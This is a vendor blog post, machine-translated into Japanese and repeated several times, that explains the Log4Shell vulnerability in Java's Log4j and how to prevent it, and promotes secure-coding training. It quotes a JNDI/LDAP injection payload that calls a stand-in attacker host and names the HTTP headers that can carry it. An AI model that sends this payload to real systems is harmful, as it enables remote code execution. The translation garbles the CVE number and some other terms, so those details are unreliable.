Log4jの近親相-v788とその近く
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
Secure Code Warrior schützt Ihren Code während des gesamten Softwareentwicklungszyklus und hilft Ihnen dabei, eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie Anwendungs-Sicherheitsmanager, Entwickler, CISO oder Sicherheitsbeauftragter sind – wir helfen Ihnen dabei, die mit unsicherem Code verbundenen Risiken zu minimieren.
デモを予約
Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und konzentriert sich auf die Untersuchung von Schwachstellen und die Erstellung von Inhalten für Mission Labs und Coding Labs.
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
Klicken Sie auf den folgenden Link, um die PDF-Datei dieser Ressource herunterzuladen.
Secure Code Warrior schützt Ihren Code während des gesamten Softwareentwicklungszyklus und hilft Ihnen dabei, eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie Anwendungs-Sicherheitsmanager, Entwickler, CISO oder Sicherheitsbeauftragter sind – wir helfen Ihnen dabei, die mit unsicherem Code verbundenen Risiken zu minimieren.
Bericht anzeigenデモを予約
Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und konzentriert sich auf die Untersuchung von Schwachstellen und die Erstellung von Inhalten für Mission Labs und Coding Labs.
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
目次
Secure Code Warrior schützt Ihren Code während des gesamten Softwareentwicklungszyklus und hilft Ihnen dabei, eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie Anwendungs-Sicherheitsmanager, Entwickler, CISO oder Sicherheitsbeauftragter sind – wir helfen Ihnen dabei, die mit unsicherem Code verbundenen Risiken zu minimieren.
デモを予約[ダウンロード]Ressourcen für den Einstieg
Themen und Inhalte der Secure-Code-Schulung
Unsere branchenführenden Inhalte werden unter Berücksichtigung der Aufgaben unserer Kunden ständig weiterentwickelt, um mit der sich ständig verändernden Softwareentwicklungsumgebung Schritt zu halten. Sie decken alle Themen von KI bis hin zu XQuery-Injection ab und sind für verschiedene Aufgabenbereiche konzipiert, von Architekten und Ingenieuren bis hin zu Produktmanagern und Qualitätssicherungsfachleuten. Werfen Sie einen Blick auf die Inhalte unseres Content-Katalogs, sortiert nach Themen und Aufgabenbereichen.
Die Kamer van Koophandel setzt Maßstäbe für entwicklergesteuerte Sicherheit in großem Maßstab
Die Kamer van Koophandel berichtet, wie sie sicheres Codieren durch rollenbasierte Zertifizierungen, Trust Score-Benchmarking und eine Kultur der gemeinsamen Verantwortung für Sicherheit in die tägliche Entwicklungsarbeit integriert hat.
%20(1).avif)
.avif)
Bedrohungsmodellierung mit KI: So wird jeder Entwickler zum Bedrohungsmodellierer
Sie werden besser gerüstet sein, um Entwicklern dabei zu helfen, Ideen und Techniken zur Bedrohungsmodellierung mit den KI-Tools zu kombinieren, die sie bereits verwenden, um die Sicherheit zu erhöhen, die Zusammenarbeit zu verbessern und von Anfang an widerstandsfähigere Software zu entwickeln.
Ressourcen für den Einstieg
Cybermon ist zurück: Die KI-Mission zum Besiegen des Bosses ist jetzt auf Abruf verfügbar.
「Cybermon 2025 Beat the Boss」 kann nun das ganze Jahr über bei SCW gespielt werden. Führen Sie anspruchsvolle AI/LLM-Sicherheitsherausforderungen ein, um die sichere AI-Entwicklung in großem Maßstab zu stärken.
Erläuterung des Cyber-Resilience-Gesetzes: Bedeutung für die Entwicklung sicherer Software
Erfahren Sie, was das EU-Gesetz zur Cyberresilienz (CRA) verlangt, für wen es gilt und wie sich Ingenieurteams auf Secure-by-Design-Praktiken, Schwachstellenprävention und die Kompetenzentwicklung von Entwicklern vorbereiten können.
Enabler 1: Definierte und messbare Erfolgskriterien
Enabler 1 ist der erste Teil der zehnteiligen Reihe „Enablers of Success“ und zeigt, wie sichere Programmierung mit geschäftlichen Ergebnissen wie Risikominderung und Geschwindigkeit verknüpft werden kann, um Programme langfristig zu optimieren.
